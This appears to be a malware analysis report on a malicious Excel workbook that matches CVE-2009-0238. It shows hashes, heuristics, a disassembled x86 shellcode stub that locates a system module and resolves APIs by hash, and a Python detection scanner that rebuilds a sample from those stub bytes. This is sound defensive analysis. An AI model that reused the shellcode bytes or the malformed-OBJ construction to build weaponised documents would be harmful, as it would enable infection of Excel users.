Malicious Office (OLE) / .RL — malware analysis report

Static analysis result for SHA-256 f2ab204255c30878…

MALICIOUS

Office (OLE) / .RL

Size: 144.8 KB · Created: 2007-01-19 05:34:10 · Authoring application: Microsoft Excel · First seen: 2026-06-21
MD5: c574926af45f972190b008d6c8ff3d4e
SHA-1: 46181cf01e08b1760cecac95bbd486dd3b808988
SHA-256: f2ab204255c3087814a638b297e248b2c2e81bd3682bdcdd52cf4baff539d1d3
Risk score: 220

Heuristics (5)

  • Excel invalid object access exploit (CVE-2009-0238) · critical · CVE likely · CVE_2009_0238
    The workbook stream contains repeated malformed OBJ records whose ftMacro subrecord points to 0xFFFF, sitting next to shellcode-style payload bytes. That combination matches the invalid-object access exploit shape used by CVE-2009-0238 rather than a generic BIFF anomaly. The CVE attribution is a static match on record shape ("CVE likely"), not confirmation that the payload triggers on any particular Excel build.
  • x86 GetPC stub (CALL $+5; POP EBX) · high · SC_GETPC_CALL
    CALL $+5 pushes the address of the next instruction and POP EBX recovers it, so the shellcode learns its own location without relying on a fixed base. The bytes that follow are the classic sequel: read the TEB pointer from fs:[0x18], walk the SEH chain (ExceptionList at TEB+0) to the record whose next pointer is -1, take that handler's address, mask it to a 64 KB boundary and step down one page at a time until an "MZ" header with a matching "PE" signature is found, i.e. the base of a system module (historically kernel32.dll). The base is saved in a 0x280-byte stack frame and two functions are resolved by 32-bit hash (0x6c3d8815 and 0x4fd18963) through the routine at 0x48bf; the hash algorithm and the resolved names are not recoverable from this excerpt.
    Disassembly
    x86 disassembly · validity: code (0.984) — 9/9 branch targets land on an instruction boundary (100% coherence)
    000046E1  e800000000        call 0x46e6
    000046E6  5b                pop ebx
    000046E7  648b3518000000    mov esi, dword ptr fs:[0x18]
    000046EE  ad                lodsd eax, dword ptr [esi]
    000046EF  8338ff            cmp dword ptr [eax], -1
    000046F2  7404              je 0x46f8
    000046F4  8b00              mov eax, dword ptr [eax]
    000046F6  ebf7              jmp 0x46ef
    000046F8  8b4004            mov eax, dword ptr [eax + 4]
    000046FB  250000ffff        and eax, 0xffff0000
    00004700  6681384d5a        cmp word ptr [eax], 0x5a4d
    00004705  750e              jne 0x4715
    00004707  8b583c            mov ebx, dword ptr [eax + 0x3c]
    0000470A  03d8              add ebx, eax
    0000470C  66813b5045        cmp word ptr [ebx], 0x4550
    00004711  7502              jne 0x4715
    00004713  eb03              jmp 0x4718
    00004715  48                dec eax
    00004716  ebe3              jmp 0x46fb
    00004718  81ec80020000      sub esp, 0x280
    0000471E  8bf4              mov esi, esp
    00004720  8906              mov dword ptr [esi], eax
    00004722  c7462400000000    mov dword ptr [esi + 0x24], 0
    00004729  ff36              push dword ptr [esi]
    0000472B  6815883d6c        push 0x6c3d8815
    00004730  e88a010000        call 0x48bf
    00004735  894604            mov dword ptr [esi + 4], eax
    00004738  ff36              push dword ptr [esi]
    0000473A  686389d14f        push 0x4fd18963
    0000473F  e8                .byte 0xe8
    00004740  7b                .byte 0x7b
    (excerpt ends mid-instruction: 0xE8 opens a third CALL whose 32-bit displacement lies beyond the bytes shown, so the disassembler emits raw bytes)
  • Heap-spray pattern detected · high · SC_HEAP_SPRAY
    Repeated 0x41 ("A") bytes found; 0x41 decodes as inc ecx, which is why the region scores as a sled rather than as code.
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 95% of instructions — a sled or padding/filler run, not program logic).
  • Reference to LoadLibrary API · high · SC_STR_LOADLIBRARY
    The string LoadLibrary is present in the file. On its own this is weak evidence (legitimate documents can carry it), but next to the GetPC stub it is the name shellcode needs to map additional modules at run time.
  • Reference to GetProcAddress API · high · SC_STR_GETPROCADDRESS
    The string GetProcAddress is present. Together with LoadLibrary it is the standard pair for resolving further imports once a module base has been located, which is exactly what the stub above sets out to find.
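A scanner that reproduces the checks behind the five findings at the byte level, added here as an example (it is not the tool that produced this report). It parses BIFF8 record and OBJ-subrecord headers (u16 type/ft followed by u16 length), flags ftMacro subrecords that begin with 0xFFFF (an assumption about what "points to 0xFFFF" denotes), finds the CALL $+5 / POP r32 stub, measures the longest 0x41 run, and greps the API names. The sample stream, the subrecord layout of the bad OBJ record and the 256-byte sled threshold are constructed for the example; only the stub bytes are copied from the disassembly above.

```python
"""Static triage of a BIFF8 workbook stream: the OBJ/ftMacro check behind the
CVE-2009-0238 finding plus the byte-level shellcode heuristics (GetPC stub,
0x41 sled, LoadLibrary/GetProcAddress strings). Added example; SAMPLE below is
constructed and is not taken from the analysed file."""
import re
import struct

BOF_RECORD = 0x0809       # BIFF8 BOF record type
OBJ_RECORD = 0x005D       # BIFF8 OBJ record type
CONTINUE_RECORD = 0x003C  # BIFF8 CONTINUE record type
FT_CMO, FT_MACRO, FT_END = 0x0015, 0x0004, 0x0000  # OBJ subrecord ids


def biff_records(stream):
    """Yield (type, payload) for each BIFF record: u16 type, u16 length, payload."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        off += 4
        yield rtype, stream[off:off + rlen]
        off += rlen


def obj_subrecords(payload):
    """Yield (ft, data) for each OBJ subrecord: u16 ft, u16 cb, data[cb]."""
    off = 0
    while off + 4 <= len(payload):
        ft, cb = struct.unpack_from("<HH", payload, off)
        off += 4
        yield ft, payload[off:off + cb]
        off += cb
        if ft == FT_END:
            break


def malformed_ftmacro_count(stream):
    """Count OBJ records whose ftMacro subrecord begins with 0xFFFF.
    Assumption: this is the 'points to 0xFFFF' shape the report flags."""
    hits = 0
    for rtype, payload in biff_records(stream):
        if rtype != OBJ_RECORD:
            continue
        for ft, data in obj_subrecords(payload):
            if ft == FT_MACRO and data[:2] == b"\xff\xff":
                hits += 1
    return hits


# CALL $+5 (e8 00 00 00 00) directly followed by POP r32 (opcodes 58..5f).
GETPC_STUB = re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]", re.DOTALL)
API_STRINGS = re.compile(rb"LoadLibrary(?:Ex)?[AW]?|GetProcAddress")


def longest_run(buf, value):
    """Length of the longest run of one byte value (0x41 disassembles as inc ecx)."""
    best = cur = 0
    for b in buf:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def triage(stream, spray_min=256):
    """Run the heuristics over the raw stream and return the findings."""
    sled = longest_run(stream, 0x41)
    return {
        "malformed_ftmacro_objs": malformed_ftmacro_count(stream),
        "getpc_stubs": [m.start() for m in GETPC_STUB.finditer(stream)],
        "longest_0x41_run": sled,
        "heap_spray": sled >= spray_min,  # threshold is an assumption
        "api_strings": sorted(set(API_STRINGS.findall(stream))),
    }


def record(rtype, payload):
    """Wrap a payload in a BIFF record header."""
    return struct.pack("<HH", rtype, len(payload)) + payload


# Constructed sample: BOF, three OBJ records with ftMacro -> 0xFFFF, then a
# CONTINUE record carrying a 0x41 sled, the stub bytes from the report's
# disassembly (0x46E1..0x473F) and two API-name strings.
SHELLCODE = bytes.fromhex(
    "e800000000 5b 648b3518000000 ad 8338ff 7404 8b00 ebf7 "
    "8b4004 250000ffff 6681384d5a 750e 8b583c 03d8 66813b5045 7502 "
    "eb03 48 ebe3 81ec80020000 8bf4 8906 c7462400000000 ff36 "
    "6815883d6c e88a010000 894604 ff36 686389d14f"
)
BAD_OBJ = record(
    OBJ_RECORD,
    struct.pack("<HH", FT_CMO, 18) + bytes(18)                # ftCmo, fields zeroed
    + struct.pack("<HH", FT_MACRO, 4) + b"\xff\xff\x00\x00"   # ftMacro -> 0xFFFF
    + struct.pack("<HH", FT_END, 0),
)
SAMPLE = (
    record(BOF_RECORD, bytes(16))
    + BAD_OBJ * 3
    + record(CONTINUE_RECORD,
             b"A" * 300 + SHELLCODE + b"LoadLibraryA\x00GetProcAddress\x00")
)

if __name__ == "__main__":
    for name, value in triage(SAMPLE).items():
        print(f"{name}: {value}")
```

Against a real sample the record parser must be fed the Workbook stream extracted from the OLE container (for example with olefile), since it reads raw BIFF headers; the stub, sled and string checks can equally be run over the whole file, and a short 0x41 run or a lone LoadLibrary string should be read as weak evidence until it co-occurs with the others, as it does here.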